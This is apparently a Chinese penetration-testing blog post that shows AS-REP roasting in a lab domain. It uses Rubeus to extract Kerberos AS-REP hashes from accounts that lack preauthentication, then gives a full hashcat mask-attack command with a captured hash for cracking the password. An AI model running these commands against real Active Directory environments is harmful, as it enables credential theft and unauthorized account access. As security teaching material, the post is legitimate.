As-repoasting爆破

这个功能会通过LDAP查询域内用户设置了选项”Do not require Kerberos preauthentication”,然后发AS_REQ的包,直接生成hash或者john可破解的格式


我们先设置一个用户不需要预验证
As-repoasting爆破_第1张图片
然后直接使用Rubeus来寻找可以利用的用户~~
执行的命令为:

Rubeus.exe asreproast

As-repoasting爆破_第2张图片这样我们直接用hashcat爆破密码就行了
这儿默认返回的是hash格式的,若想要返回john格式的
执行命令

Rubeus.exe asreproast /format:john

我这儿用hashcat的掩码模式来爆破

hashcat64.exe -a 3 -m 18200 $krb5asrep$23$test1@test.com:01EF9F8A158B0639063FFB1CAD887C4F$BAE81E3FB47820582AF6ECB854C69539FF6FCEBBBC37ED7952FFAD752A8D23E457BD44BF9F12AA447DF9C16D820C96372D51982C8FA7B4113EAA3F462877E2E04A9F13F5CC1F0FF05CF6455927B3587CC10E4BC56608E9A0CF08E4F13537520A4EDEAF4F03F3B9E9451D368DB7219B29D23F440C4D1E4816C983AED9AA35B068B049216A50B0267A3EA69DD97C70712CF3C4A375D55E7C9AEB693DA167C7BA93F86849323B542E43558F4C8F64A64D85B54C4A87A7360FDC65EA5EE443AFDBF7F86F604FBD2B0A8523E92F6C830B1B56F7FB1EBFA3D07CD89E5F68D20FF69E80022E2757 -1 qwe!@#123456789 --increment --increment-min 9 --increment-max 9 ?1?1?1?1?1?1?1?1?1

As-repoasting爆破_第3张图片更多hashcat -m请参考链接

你可能感兴趣的:(渗透测试)